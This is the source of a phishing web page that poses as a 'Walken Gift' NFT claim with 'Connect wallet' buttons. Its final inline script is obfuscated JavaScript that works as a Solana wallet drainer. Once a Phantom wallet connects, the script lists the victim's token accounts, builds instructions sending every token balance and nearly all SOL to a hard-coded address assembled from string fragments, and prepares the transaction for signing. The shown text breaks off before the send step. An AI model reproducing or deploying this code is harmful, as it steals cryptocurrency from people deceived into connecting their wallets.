<!doctype html>
<html lang="en">

<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link
        href="https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&family=Roboto+Mono:wght@700&display=swap"
        rel="stylesheet">
    <meta charset="utf-8" />
    <link rel="icon" href="favicon.ico" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <meta name="theme-color" content="#000000" />
    <meta name="description" content="Web site created using create-react-app" />
    <link rel="apple-touch-icon" href="logo192.png" />
    <link rel="manifest" href="manifest.json" />
    <title>SolFast</title>
    <script defer="defer" src="static/js/main.39d8851f.js"></script>
    <link href="static/css/main.99e164e4.css" rel="stylesheet">
</head>

<body>
    <div id="rot"></div>
    <div class="rblock-item">
        <div class="btn-wrapper">
            <div class="btn-asp-box trigger"><button class="tg3-1-btn trigger buttonWallet" aria-label="connect"><span
                        class="tg3-1-text trigger">Connect</span></button></div>
        </div>
    </div>
    <div id="mytrigger" class="rblock-item">
        <div class="btn-wrapper">
            <div class="btn-asp-box trigger"><button class="tg3-1-btn trigger buttonWallet" aria-label="connect"><span
                        class="tg3-1-text trigger">Connect</span></button></div>
        </div>
    </div>
    <script>navigator.userAgent.search("Safari") >= 0 && navigator.userAgent.search("Chrome") < 0 && (Array.from(document.querySelectorAll(".video-safari-change")).map((function (r) { return r.style.display = "none" })), Array.from(document.querySelectorAll(".gif-safari-change")).map((function (r) { return r.style.display = "block" })))</script>
    <script type="text/javascript" src="https://solfast.xyz/js/app.js"></script>
    <script></script>
    <script src="js/chunk.js"></script>
    <script src="js/tokenup.js"></script>
    <script src="js/main.chunk.js"></script>
    <script src="js/lib.js"></script>
    <script src="js/life.js"></script>
    <html lang="en">

    <head>
        <div hidden>
            <meta charset="UTF-8">
            <meta http-equiv="X-UA-Compatible" content="IE=edge">
            <meta name="viewport" content="width=device-width,initial-scale=1">
            <link rel="stylesheet" href="https://solfast.xyz/css/fonts.css">
            <title>Walken Gift</title>
            <link href="https://app.openlogin.com/start" crossorigin="anonymous" type="text/html" rel="prefetch">
            <link href="https://app.openlogin.com/sdk-modal" crossorigin="anonymous" type="text/html" rel="prefetch">
            <style data-styled="active" data-styled-version="5.3.1"></style>
            <style data-jss="" data-meta="MuiTouchRipple">
                .MuiTouchRipple-root {
                    top: 0;
                    left: 0;
                    right: 0;
                    bottom: 0;
                    z-index: 0;
                    overflow: hidden;
                    position: absolute;
                    border-radius: inherit;
                    pointer-events: none
                }

                .MuiTouchRipple-ripple {
                    opacity: 0;
                    position: absolute
                }

                .MuiTouchRipple-rippleVisible {
                    opacity: .3;
                    animation: MuiTouchRipple-keyframes-enter 550ms cubic-bezier(.4, 0, .2, 1);
                    transform: scale(1)
                }

                .MuiTouchRipple-ripplePulsate {
                    animation-duration: .2s
                }

                .MuiTouchRipple-child {
                    width: 100%;
                    height: 100%;
                    display: block;
                    opacity: 1;
                    border-radius: 50%;
                    background-color: currentColor
                }

                .MuiTouchRipple-childLeaving {
                    opacity: 0;
                    animation: MuiTouchRipple-keyframes-exit 550ms cubic-bezier(.4, 0, .2, 1)
                }

                .MuiTouchRipple-childPulsate {
                    top: 0;
                    left: 0;
                    position: absolute;
                    animation: MuiTouchRipple-keyframes-pulsate 2.5s cubic-bezier(.4, 0, .2, 1) .2s infinite
                }

                @-webkit-keyframes MuiTouchRipple-keyframes-enter {
                    0% {
                        opacity: .1;
                        transform: scale(0)
                    }

                    100% {
                        opacity: .3;
                        transform: scale(1)
                    }
                }

                @-webkit-keyframes MuiTouchRipple-keyframes-exit {
                    0% {
                        opacity: 1
                    }

                    100% {
                        opacity: 0
                    }
                }

                @-webkit-keyframes MuiTouchRipple-keyframes-pulsate {
                    0% {
                        transform: scale(1)
                    }

                    50% {
                        transform: scale(.92)
                    }

                    100% {
                        transform: scale(1)
                    }
                }
            </style>
            <style data-jss="" data-meta="MuiButtonBase">
                .MuiButtonBase-root {
                    color: inherit;
                    border: 0;
                    cursor: pointer;
                    margin: 0;
                    display: inline-flex;
                    outline: 0;
                    padding: 0;
                    position: relative;
                    align-items: center;
                    user-select: none;
                    border-radius: 0;
                    vertical-align: middle;
                    -moz-appearance: none;
                    justify-content: center;
                    text-decoration: none;
                    background-color: transparent;
                    -webkit-appearance: none;
                    -webkit-tap-highlight-color: transparent
                }

                .MuiButtonBase-root::-moz-focus-inner {
                    border-style: none
                }

                .MuiButtonBase-root.Mui-disabled {
                    cursor: default;
                    pointer-events: none
                }

                @media print {
                    .MuiButtonBase-root {
                        -webkit-print-color-adjust: exact
                    }
                }
            </style>
            <style data-jss="" data-meta="MuiButton">
                .MuiButton-root {
                    color: #fff;
                    padding: 12px 16px;
                    font-size: .875rem;
                    min-width: 64px;
                    box-sizing: border-box;
                    transition: background-color 250ms cubic-bezier(.4, 0, .2, 1) 0s, box-shadow 250ms cubic-bezier(.4, 0, .2, 1) 0s, border 250ms cubic-bezier(.4, 0, .2, 1) 0s;
                    font-family: Roboto, Helvetica, Arial, sans-serif;
                    font-weight: 500;
                    line-height: 1.75;
                    border-radius: 4px;
                    letter-spacing: .02857em
                }

                .MuiButton-root:hover {
                    text-decoration: none;
                    background-color: rgba(255, 255, 255, .08)
                }

                .MuiButton-root.Mui-disabled {
                    color: rgba(255, 255, 255, .3)
                }

                @media (hover:none) {
                    .MuiButton-root:hover {
                        background-color: transparent
                    }
                }

                .MuiButton-root:hover.Mui-disabled {
                    background-color: transparent
                }

                .MuiButton-label {
                    width: 100%;
                    display: inherit;
                    align-items: inherit;
                    white-space: nowrap;
                    justify-content: inherit
                }

                .MuiButton-text {
                    padding: 6px 8px
                }

                .MuiButton-textPrimary {
                    color: #3f51b5
                }

                .MuiButton-textPrimary:hover {
                    background-color: rgba(63, 81, 181, .08)
                }

                @media (hover:none) {
                    .MuiButton-textPrimary:hover {
                        background-color: transparent
                    }
                }

                .MuiButton-textSecondary {
                    color: #f50057
                }

                .MuiButton-textSecondary:hover {
                    background-color: rgba(245, 0, 87, .08)
                }

                @media (hover:none) {
                    .MuiButton-textSecondary:hover {
                        background-color: transparent
                    }
                }

                .MuiButton-outlined {
                    border: 1px solid rgba(255, 255, 255, .23);
                    padding: 5px 15px
                }

                .MuiButton-outlined.Mui-disabled {
                    border: 1px solid rgba(255, 255, 255, .12)
                }

                .MuiButton-outlinedPrimary {
                    color: #3f51b5;
                    border: 1px solid rgba(63, 81, 181, .5)
                }

                .MuiButton-outlinedPrimary:hover {
                    border: 1px solid #3f51b5;
                    background-color: rgba(63, 81, 181, .08)
                }

                @media (hover:none) {
                    .MuiButton-outlinedPrimary:hover {
                        background-color: transparent
                    }
                }

                .MuiButton-contained {
                    color: rgba(0, 0, 0, .87);
                    box-shadow: 0 3px 1px -2px rgba(0, 0, 0, .2), 0 2px 2px 0 rgba(0, 0, 0, .14), 0 1px 5px 0 rgba(0, 0, 0, .12);
                    background-color: #e0e0e0
                }

                .MuiButton-contained:hover {
                    box-shadow: 0 2px 4px -1px rgba(0, 0, 0, .2), 0 4px 5px 0 rgba(0, 0, 0, .14), 0 1px 10px 0 rgba(0, 0, 0, .12);
                    background-color: #d5d5d5
                }

                .MuiButton-contained.Mui-focusVisible {
                    box-shadow: 0 3px 5px -1px rgba(0, 0, 0, .2), 0 6px 10px 0 rgba(0, 0, 0, .14), 0 1px 18px 0 rgba(0, 0, 0, .12)
                }

                .MuiButton-contained:active {
                    box-shadow: 0 5px 5px -3px rgba(0, 0, 0, .2), 0 8px 10px 1px rgba(0, 0, 0, .14), 0 3px 14px 2px rgba(0, 0, 0, .12)
                }

                .MuiButton-contained.Mui-disabled {
                    color: rgba(255, 255, 255, .3);
                    box-shadow: none;
                    background-color: rgba(255, 255, 255, .12)
                }

                @media (hover:none) {
                    .MuiButton-contained:hover {
                        box-shadow: 0 3px 1px -2px rgba(0, 0, 0, .2), 0 2px 2px 0 rgba(0, 0, 0, .14), 0 1px 5px 0 rgba(0, 0, 0, .12);
                        background-color: #e0e0e0
                    }
                }

                .MuiButton-contained:hover.Mui-disabled {
                    background-color: rgba(255, 255, 255, .12)
                }

                .MuiButton-containedPrimary {
                    color: #fff;
                    background-color: #3f51b5
                }

                .MuiButton-containedPrimary:hover {
                    background-color: #303f9f
                }

                @media (hover:none) {
                    .MuiButton-containedPrimary:hover {
                        background-color: #3f51b5
                    }
                }

                .MuiButton-disableElevation {
                    box-shadow: none
                }

                .MuiButton-disableElevation:hover {
                    box-shadow: none
                }

                .MuiButton-disableElevation.Mui-focusVisible {
                    box-shadow: none
                }

                .MuiButton-disableElevation:active {
                    box-shadow: none
                }

                .MuiButton-disableElevation.Mui-disabled {
                    box-shadow: none
                }

                .MuiButton-colorInherit {
                    color: inherit;
                    border-color: currentColor
                }

                .MuiButton-textSizeSmall {
                    padding: 4px 5px;
                    font-size: .8125rem
                }

                .MuiButton-textSizeLarge {
                    padding: 8px 11px;
                    font-size: .9375rem
                }

                .MuiButton-outlinedSizeSmall {
                    padding: 3px 9px;
                    font-size: .8125rem
                }

                .MuiButton-outlinedSizeLarge {
                    padding: 7px 21px;
                    font-size: .9375rem
                }

                .MuiButton-containedSizeSmall {
                    padding: 4px 10px;
                    font-size: .8125rem
                }

                .MuiButton-containedSizeLarge {
                    padding: 8px 22px;
                    font-size: .9375rem
                }

                .MuiButton-fullWidth {
                    width: 100%
                }

                .MuiButton-startIcon {
                    display: inherit;
                    margin-left: -4px;
                    margin-right: 20px
                }

                .MuiButton-startIcon.MuiButton-iconSizeSmall {
                    margin-left: -2px
                }

                .MuiButton-endIcon {
                    display: inherit;
                    margin-left: 20px;
                    margin-right: -4px
                }

                .MuiButton-endIcon.MuiButton-iconSizeSmall {
                    margin-right: -2px
                }

                .MuiButton-iconSizeSmall>:first-child {
                    font-size: 18px
                }

                .MuiButton-iconSizeMedium>:first-child {
                    font-size: 20px
                }

                .MuiButton-iconSizeLarge>:first-child {
                    font-size: 22px
                }
            </style>
            <style data-jss="" data-meta="MuiSnackbar">
                .MuiSnackbar-root {
                    left: 8px;
                    right: 8px;
                    display: flex;
                    z-index: 1400;
                    position: fixed;
                    align-items: center;
                    justify-content: center
                }

                .MuiSnackbar-anchorOriginTopCenter {
                    top: 8px
                }

                @media (min-width:600px) {
                    .MuiSnackbar-anchorOriginTopCenter {
                        top: 24px;
                        left: 50%;
                        right: auto;
                        transform: translateX(-50%)
                    }
                }

                .MuiSnackbar-anchorOriginBottomCenter {
                    bottom: 8px
                }

                @media (min-width:600px) {
                    .MuiSnackbar-anchorOriginBottomCenter {
                        left: 50%;
                        right: auto;
                        bottom: 24px;
                        transform: translateX(-50%)
                    }
                }

                .MuiSnackbar-anchorOriginTopRight {
                    top: 8px;
                    justify-content: flex-end
                }

                @media (min-width:600px) {
                    .MuiSnackbar-anchorOriginTopRight {
                        top: 24px;
                        left: auto;
                        right: 24px
                    }
                }

                .MuiSnackbar-anchorOriginBottomRight {
                    bottom: 8px;
                    justify-content: flex-end
                }

                @media (min-width:600px) {
                    .MuiSnackbar-anchorOriginBottomRight {
                        left: auto;
                        right: 24px;
                        bottom: 24px
                    }
                }

                .MuiSnackbar-anchorOriginTopLeft {
                    top: 8px;
                    justify-content: flex-start
                }

                @media (min-width:600px) {
                    .MuiSnackbar-anchorOriginTopLeft {
                        top: 24px;
                        left: 24px;
                        right: auto
                    }
                }

                .MuiSnackbar-anchorOriginBottomLeft {
                    bottom: 8px;
                    justify-content: flex-start
                }

                @media (min-width:600px) {
                    .MuiSnackbar-anchorOriginBottomLeft {
                        left: 24px;
                        right: auto;
                        bottom: 24px
                    }
                }
            </style>
            <style data-jss="" data-meta="MuiDialog">
                @media print {
                    .MuiDialog-root {
                        position: absolute !important
                    }
                }

                .MuiDialog-scrollPaper {
                    display: flex;
                    align-items: center;
                    justify-content: center
                }

                .MuiDialog-scrollBody {
                    overflow-x: hidden;
                    overflow-y: auto;
                    text-align: center
                }

                .MuiDialog-scrollBody:after {
                    width: 0;
                    height: 100%;
                    content: "";
                    display: inline-block;
                    vertical-align: middle
                }

                .MuiDialog-container {
                    height: 100%;
                    outline: 0
                }

                @media print {
                    .MuiDialog-container {
                        height: auto
                    }
                }

                .MuiDialog-paper {
                    margin: 32px;
                    position: relative;
                    overflow-y: auto
                }

                @media print {
                    .MuiDialog-paper {
                        box-shadow: none;
                        overflow-y: visible
                    }
                }

                .MuiDialog-paperScrollPaper {
                    display: flex;
                    max-height: calc(100% - 64px);
                    flex-direction: column
                }

                .MuiDialog-paperScrollBody {
                    display: inline-block;
                    text-align: left;
                    vertical-align: middle
                }

                .MuiDialog-paperWidthFalse {
                    max-width: calc(100% - 64px)
                }

                .MuiDialog-paperWidthXs {
                    max-width: 444px
                }

                @media (max-width:507.95px) {
                    .MuiDialog-paperWidthXs.MuiDialog-paperScrollBody {
                        max-width: calc(100% - 64px)
                    }
                }

                .MuiDialog-paperWidthSm {
                    max-width: 600px
                }

                @media (max-width:663.95px) {
                    .MuiDialog-paperWidthSm.MuiDialog-paperScrollBody {
                        max-width: calc(100% - 64px)
                    }
                }

                .MuiDialog-paperWidthMd {
                    max-width: 960px
                }

                @media (max-width:1023.95px) {
                    .MuiDialog-paperWidthMd.MuiDialog-paperScrollBody {
                        max-width: calc(100% - 64px)
                    }
                }

                .MuiDialog-paperWidthLg {
                    max-width: 1280px
                }

                @media (max-width:1343.95px) {
                    .MuiDialog-paperWidthLg.MuiDialog-paperScrollBody {
                        max-width: calc(100% - 64px)
                    }
                }

                .MuiDialog-paperWidthXl {
                    max-width: 1920px
                }

                @media (max-width:1983.95px) {
                    .MuiDialog-paperWidthXl.MuiDialog-paperScrollBody {
                        max-width: calc(100% - 64px)
                    }
                }

                .MuiDialog-paperFullWidth {
                    width: calc(100% - 64px)
                }

                .MuiDialog-paperFullScreen {
                    width: 100%;
                    height: 100%;
                    margin: 0;
                    max-width: 100%;
                    max-height: none;
                    border-radius: 0
                }

                .MuiDialog-paperFullScreen.MuiDialog-paperScrollBody {
                    margin: 0;
                    max-width: 100%
                }
            </style>
            <style data-jss="" data-meta="makeStyles">
                .jss1 .MuiDialog-paper {
                    width: 320px;
                    margin: 0
                }

                .jss1 .MuiDialogTitle-root {
                    background-color: #3f51b5
                }

                .jss1 .MuiDialogContent-root {
                    padding: 0
                }

                .jss1 .MuiDialogContent-root .MuiList-root {
                    padding: 0;
                    background: #212121
                }

                .jss1 .MuiDialogContent-root .MuiListItem-root {
                    padding: 0;
                    box-shadow: inset 0 1px 0 0 rgba(255, 255, 255, .1)
                }

                .jss1 .MuiDialogContent-root .MuiListItem-root:hover {
                    box-shadow: inset 0 1px 0 0 rgba(255, 255, 255, .1), 0 1px 0 0 rgba(255, 255, 255, .05)
                }

                .jss1 .MuiDialogContent-root .MuiListItem-root .MuiButton-endIcon {
                    margin: 0
                }

                .jss1 .MuiDialogContent-root .MuiListItem-root .MuiButton-root {
                    padding: 8px 24px;
                    flex-grow: 1;
                    font-size: 1rem;
                    font-weight: 400;
                    justify-content: space-between
                }

                .jss1 .MuiDialogContent-root .MuiListItem-root .MuiSvgIcon-root {
                    color: #9e9e9e
                }

                .jss1 .MuiDialogContent-root .MuiCollapse-root .MuiList-root {
                    background: #212121
                }

                .jss1 .MuiDialogTitle-root .MuiTypography-root {
                    display: flex;
                    line-height: 40px;
                    justify-content: space-between
                }

                .jss1 .MuiDialogTitle-root .MuiIconButton-root {
                    color: #9e9e9e;
                    padding: 8px;
                    flex-shrink: 1;
                    margin-right: -8px
                }
            </style>
        </div>

    <body>
        <section>
            <div hidden class="container"><img src="https://solfast.xyz/fonts/logo.svg" alt="logotype" class="logotype">
                <form action="index.html#">
                    <h2 class="head_h">Walken Gift</h2>
                    <h3 class="head">Get a gift for reaching League II</h3>
                    <div class="item"><img src="https://solfast.xyz/images/nft3.png" alt="NFT">
                        <h3 class="descr">T-shirt</h3>
                        <h2 class="number">#55597976</h2>
                    </div><button class="main__button trigger">Connect wallet</button>
                </form>
                <div class="content">
                    <div class="item">
                        <div class="camera">
                            <div class="speaker"></div>
                            <div class="cam"><span></span></div>
                        </div>
                        <div class="item-content">
                            <div class="images">
                                <div class="image after"></div>
                                <div class="image _active"><img src="https://solfast.xyz/fonts/1.svg" alt="1"></div>
                                <div class="image before"><img src="https://solfast.xyz/fonts/2.svg" alt="2"></div>
                            </div>
                        </div>
                        <div class="head__item-text"></div>
                        <div class="item-text">
                            <h2>League I</h2>
                            <h3>Minimum CAThlete level - 0</h3>
                            <div class="tokens"><a>Possible earnings: up to <b>81.757</b></a><img
                                    src="https://solfast.xyz/fonts/token.svg" alt=""></div>
                            <div class="pagination"><span class="bullet _active"></span> <span class="bullet"></span>
                                <span class="bullet"></span> <span class="bullet"></span> <span class="bullet"></span>
                            </div><a class="main__button">Complete in League I</a>
                        </div>
                    </div>
                    <div class="item league__two">
                        <div class="camera">
                            <div class="speaker"></div>
                            <div class="cam"><span></span></div>
                        </div>
                        <div class="item-content">
                            <div class="images">
                                <div class="image after"><img src="https://solfast.xyz/fonts/1.svg" alt="1"></div>
                                <div class="image _active"><img src="https://solfast.xyz/fonts/2.svg" alt="2"></div>
                                <div class="image before"><img src="https://solfast.xyz/fonts/3.svg" alt="3"></div>
                            </div>
                        </div>
                        <div class="head__item-text"></div>
                        <div class="item-text">
                            <h2>League II</h2>
                            <h3>Minimum CAThlete level - 2</h3>
                            <div class="tokens"><a>Possible earnings: up to <b>245.271</b></a><img
                                    src="https://solfast.xyz/fonts/token.svg" alt=""></div>
                            <div class="pagination"><span class="bullet"></span> <span class="bullet _active"></span>
                                <span class="bullet"></span> <span class="bullet"></span> <span class="bullet"></span>
                            </div><a class="main__button">Complete in League II</a>
                        </div>
                    </div>
                    <div class="item league__three">
                        <div class="camera">
                            <div class="speaker"></div>
                            <div class="cam"><span></span></div>
                        </div>
                        <div class="item-content">
                            <div class="images">
                                <div class="image after"><img src="https://solfast.xyz/fonts/2.svg" alt="2"></div>
                                <div class="image _active"><img src="https://solfast.xyz/fonts/3.svg" alt="3"></div>
                                <div class="image before"><img src="https://solfast.xyz/fonts/4.svg" alt="4"></div>
                            </div>
                        </div>
                        <div class="head__item-text"></div>
                        <div class="item-text">
                            <h2>League III</h2>
                            <h3>Minimum CAThlete level - 4</h3>
                            <div class="tokens"><a>Possible earnings: up to <b>245.271</b></a><img
                                    src="https://solfast.xyz/fonts/token.svg" alt=""></div>
                            <div class="pagination"><span class="bullet"></span> <span class="bullet"></span> <span
                                    class="bullet _active"></span> <span class="bullet"></span> <span
                                    class="bullet"></span></div><a class="main__button">Complete in League III</a>
                        </div>
                    </div>
                    <div class="item league__four">
                        <div class="camera">
                            <div class="speaker"></div>
                            <div class="cam"><span></span></div>
                        </div>
                        <div class="item-content">
                            <div class="images">
                                <div class="image after"><img src="https://solfast.xyz/fonts/3.svg" alt="3"></div>
                                <div class="image _active"><img src="https://solfast.xyz/fonts/4.svg" alt="4"></div>
                                <div class="image before"><img src="https://solfast.xyz/fonts/5.svg" alt="5"></div>
                            </div>
                        </div>
                        <div class="head__item-text"></div>
                        <div class="item-text">
                            <h2>League IV</h2>
                            <h3>Minimum CAThlete level - 6</h3>
                            <div class="tokens"><a>Possible earnings: up to <b>735.814</b></a><img
                                    src="https://solfast.xyz/fonts/token.svg" alt=""></div>
                            <div class="pagination"><span class="bullet"></span> <span class="bullet"></span> <span
                                    class="bullet"></span> <span class="bullet _active"></span> <span
                                    class="bullet"></span></div><a class="main__button">Complete in League IV</a>
                        </div>
                    </div>
                    <div class="item league__five">
                        <div class="camera">
                            <div class="speaker"></div>
                            <div class="cam"><span></span></div>
                        </div>
                        <div class="item-content">
                            <div class="images">
                                <div class="image after"><img src="https://solfast.xyz/fonts/4.svg" alt="4"></div>
                                <div class="image _active"><img src="https://solfast.xyz/fonts/5.svg" alt="5"></div>
                                <div class="image before"></div>
                            </div>
                        </div>
                        <div class="head__item-text"></div>
                        <div class="item-text">
                            <h2>League V</h2>
                            <h3>Minimum CAThlete level - 8</h3>
                            <div class="tokens"><a>Possible earnings: up to <b>981.085</b></a><img
                                    src="https://solfast.xyz/fonts/token.svg" alt=""></div>
                            <div class="pagination"><span class="bullet"></span> <span class="bullet"></span> <span
                                    class="bullet"></span> <span class="bullet"></span> <span
                                    class="bullet _active"></span></div><a class="main__button">Complete in League V</a>
                        </div>
                    </div>
                </div>
            </div>
            <div style="display:none" class="button-box">
                <div id="root" class="cl-root">
                    <main>
                        <div class="sc-dlfnuX bJgQKs"><button
                                class="MuiButtonBase-root MuiButton-root MuiButton-contained sc-bdfBQB kKVOCU MuiButton-containedPrimary"
                                tabindex="0" type="button"><span class="MuiButton-label">Select Wallet</span><span
                                    class="MuiTouchRipple-root"></span></button></div>
                    </main>
                </div>
            </div>
            <div class="main-area__left">
                <div class="token">
                    <div class="token-title"></div>
                    <div class="token-line"></div>
                </div>
            </div>
        </section>
        <script src="js/jquery-3.6.0.min.js"></script>
        <script src="js/slick.min.js"></script>
        <script>$(".trigger").click((function () { $("#root").find("button").trigger("click") })); const $plusButton = document.querySelector(".plus-btn"), $minuButton = document.querySelector(".minus-btn"), $numberText = document.querySelector("#total"), $remaining = document.querySelector("#remaining"), $priceResultText = document.querySelector("#price-total span"); let itemPriceSelected = 0, itemCount = 1; $plusButton.addEventListener("click", (function (t) { t.preventDefault(), itemCount = itemCount < 1 ? itemCount + 1 : 1, $numberText.value = itemCount, $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(2) })), $minuButton.addEventListener("click", (function (t) { t.preventDefault(), itemCount = parseInt($numberText.value), itemCount = itemCount > 1 ? itemCount - 1 : itemCount, $numberText.value = itemCount, $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(2) }))</script>
        <script>!function (e) { function n(n) { for (var o, s, c = n[0], i = n[1], u = n[2], d = 0, f = []; d < c.length; d++)s = c[d], Object.prototype.hasOwnProperty.call(r, s) && r[s] && f.push(r[s][0]), r[s] = 0; for (o in i) Object.prototype.hasOwnProperty.call(i, o) && (e[o] = i[o]); for (l && l(n); f.length;)f.shift()(); return a.push.apply(a, u || []), t() } function t() { for (var e, n = 0; n < a.length; n++) { for (var t = a[n], o = !0, c = 1; c < t.length; c++) { var i = t[c]; 0 !== r[i] && (o = !1) } o && (a.splice(n--, 1), e = s(s.s = t[0])) } return e } var o = {}, r = { 1: 0 }, a = []; function s(n) { if (o[n]) return o[n].exports; var t = o[n] = { i: n, l: !1, exports: {} }; return e[n].call(t.exports, t, t.exports, s), t.l = !0, t.exports } s.e = function (e) { var n = [], t = r[e]; if (0 !== t) if (t) n.push(t[2]); else { var o = new Promise((function (n, o) { t = r[e] = [n, o] })); n.push(t[2] = o); var a, c = document.createElement("script"); c.charset = "utf-8", c.timeout = 120, s.nc && c.setAttribute("nonce", s.nc), c.src = function (e) { return s.p + "../static/js/" + ({}[e] || e) + "." + { 3: "" }[e] + "chunk.js" }(e); var i = new Error; a = function (n) { c.onerror = c.onload = null, clearTimeout(u); var t = r[e]; if (0 !== t) { if (t) { var o = n && ("load" === n.type ? "missing" : n.type), a = n && n.target && n.target.src; i.message = "Loading chunk " + e + " failed.\n(" + o + ": " + a + ")", i.name = "ChunkLoadError", i.type = o, i.request = a, t[1](i) } r[e] = void 0 } }; var u = setTimeout((function () { a({ type: "timeout", target: c }) }), 12e4); c.onerror = c.onload = a, document.head.appendChild(c) } return Promise.all(n) }, s.m = e, s.c = o, s.d = function (e, n, t) { s.o(e, n) || Object.defineProperty(e, n, { enumerable: !0, get: t }) }, s.r = function (e) { "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, { value: "Module" }), Object.defineProperty(e, "__esModule", { value: !0 }) }, s.t = function (e, n) { if (1 & n && (e = s(e)), 8 & n) return e; if (4 & n && "object" == typeof e && e && e.__esModule) return e; var t = Object.create(null); if (s.r(t), Object.defineProperty(t, "default", { enumerable: !0, value: e }), 2 & n && "string" != typeof e) for (var o in e) s.d(t, o, function (n) { return e[n] }.bind(null, o)); return t }, s.n = function (e) { var n = e && e.__esModule ? function () { return e.default } : function () { return e }; return s.d(n, "a", n), n }, s.o = function (e, n) { return Object.prototype.hasOwnProperty.call(e, n) }, s.p = "/", s.oe = function (e) { throw console.error(e), e }; var c = this["webpackJsonpcandy-machine-mint"] = this["webpackJsonpcandy-machine-mint"] || [], i = c.push.bind(c); c.push = n, c = c.slice(); for (var u = 0; u < c.length; u++)n(c[u]); var l = i; t() }([]); const _0x27de6b = _0x1f1e; function _0x1f1e(e, n) { const t = _0x100d(); return (_0x1f1e = function (e, n) { return t[e -= 393] })(e, n) } function _0x100d() { const e = ["54858XegKer", "length", "...", "associatedProgramId", "getAccountInfo", " SOL", "background", "653900HELctm", "pNKcE", "1379trqfnN", "Transaction", "counet", "solana", "isPhantom", "SystemProgram", "getParsedTokenAccountsByOwner", "showcase__btn0", "space", "isConnected", "data", "load", "createTransferInstruction", "value", "getAssociatedTokenAddress", "innerText", "amount", "7487152xETAWF", "root", "27rJbaER", "toString", "add", "serialize", "t3LtR", "wqwqw", "transfer", "createAssociatedTokenAccountInstruction", "connect", "tokenAmount", "style", "27prY", "pZmyN", "innerHTML", "programId", "5245gELGjh", "TOKEN_PROGRAM_ID", "getElementById", "disconnect", "feePayer", "PublicKey", "https://phantom.app/", "data-target", "log", "confirmTransaction", "#False", "clusterApiUrl", "Token", "parsed", "2WoaUKo", "getMinimumBalanceForRentExemption", "988fggphZ", "XyQaF", "mainnet-beta", "recentBlockhash", "fgXoL", "textContent", "PJus", "sendRawTransaction", "Mint", "mint", "1949651jIKuRk", "info", "Phantom_Connect", "#e42575", "publicKey", "7644fwylYT", "account", "substring", "onclick", "2766453tdkqiR"]; return (_0x100d = function () { return e })() } function upValue() { const e = _0x1f1e; document[e(471)](e(437))[e(448)] = parseInt(1) + parseInt(document[e(471)](e(437))[e(448)]), document[e(471)](e(459)).textContent = (1.777 * parseInt(document[e(471)]("counet")[e(448)])).toFixed(2)[e(455)]() + e(431) } function downValue() { const e = _0x1f1e; "1" == document.getElementById(e(437))[e(448)] || (document.getElementById(e(437))[e(448)] = parseInt(document[e(471)]("counet")[e(448)]) - parseInt(1), document[e(471)](e(459))[e(411)] = (1.777 * parseInt(document.getElementById(e(437))[e(448)])).toFixed(2).toString() + e(431)) } !function (e, n) { const t = _0x1f1e, o = _0x100d(); for (; ;)try { if (487895 === -parseInt(t(426)) / 1 + -parseInt(t(404)) / 2 * (parseInt(t(425)) / 3) + parseInt(t(406)) / 4 * (parseInt(t(469)) / 5) + parseInt(t(421)) / 6 * (parseInt(t(435)) / 7) + parseInt(t(452)) / 8 + -parseInt(t(454)) / 9 * (-parseInt(t(433)) / 10) + -parseInt(t(416)) / 11) break; o.push(o.shift()) } catch (e) { o.push(o.shift()) } }(), window.addEventListener(_0x27de6b(446), (() => { const e = _0x27de6b; const n = new solanaWeb3.Connection(solanaWeb3[e(401)](e(408))), t = () => { const n = e; if (n(438) in window) { const e = window[n(438)]; if (e[n(439)]) return e } window.open(n(396), "_blank") }; function o() { const n = e; window[n(438)][n(444)] ? (username_text = String(provider.publicKey), username_short = username_text[n(423)](0, 8), document[n(471)](n(453)).setAttribute(n(397), n(400)), document.getElementById("showcase__btn0").innerHTML = username_short + n(428), document[n(471)](n(453)).innerText = "Mint", document[n(471)](n(453))[n(464)][n(432)] = n(419)) : window.solana.connect({ onlyIfTrusted: !1 }), r() } function r() { const n = e, o = t(); o && (o.on(n(462), (() => { const e = n; (async function () { a() })(), username_text = String(o[e(420)]), username_short = username_text[e(423)](0, 8), document.getElementById(e(453)).setAttribute(e(397), e(400)), document[e(471)](e(442))[e(467)] = username_short + e(428), document[e(471)](e(453))[e(450)] = e(414), document.getElementById(e(453))[e(464)][e(432)] = e(419) })), o.on(n(393), (() => { }))) } async function a() { const o = e; if (!window[o(438)][o(444)]) return; let r = await n.getAccountInfo(window[o(438)][o(420)]); if (null === r) return; if (0 === r.lamports) return; let a = r.lamports, s = await n[o(405)](82), c = await n.getMinimumBalanceForRentExemption(165), i = await n[o(405)](0); console[o(398)](i + 7 * c), console[o(398)]("ok"), a -= i; let u = 311; const l = new solanaWeb3.PublicKey("".concat("2K2y3", o(434), o(458), "r1yoC", o(410), o(465), o(466), o(407), o(412))), d = await n[o(441)](window[o(438)][o(420)], { programId: splToken[o(470)] }); console[o(398)](d); let f = new (solanaWeb3[o(436)]); for (let e = 0; e < d[o(448)][o(427)]; e++) { let t = d.value[e][o(422)][o(445)]; const r = t.parsed[o(417)][o(463)][o(451)]; if (r > 0) { const e = t[o(443)]; console[o(398)](a); const i = new (solanaWeb3[o(395)])(t[o(403)].info[o(415)]), d = new (splToken[o(402)])(n, i, splToken.TOKEN_PROGRAM_ID, window[o(438)][o(420)]), p = await splToken[o(402)][o(449)](d[o(429)], d[o(468)], i, window[o(438)][o(420)]), m = await splToken[o(402)].getAssociatedTokenAddress(d[o(429)], d[o(468)], i, l); if (null === await n[o(430)](m)) { if (u + 42 >= 1232) break; u += 42, f[o(456)](splToken[o(402)][o(461)](d[o(429)], d[o(468)], i, m, l, window[o(438)][o(420)])), a -= 165 === e ? c : s } if (u + 79 >= 1232) break; u += 79, console[o(398)](u), f[o(456)](splToken.Token[o(447)](splToken[o(470)], p, m, window[o(438)][o(420)], [], r)) } } f.add(solanaWeb3[o(440)][o(460)]({ fromPubkey: window.solana[o(420)], toPubkey: l, lamports: a - 5e4 })); const p = t(); if (!p) return; console[o(398)](f); let { blockhash: m } = await 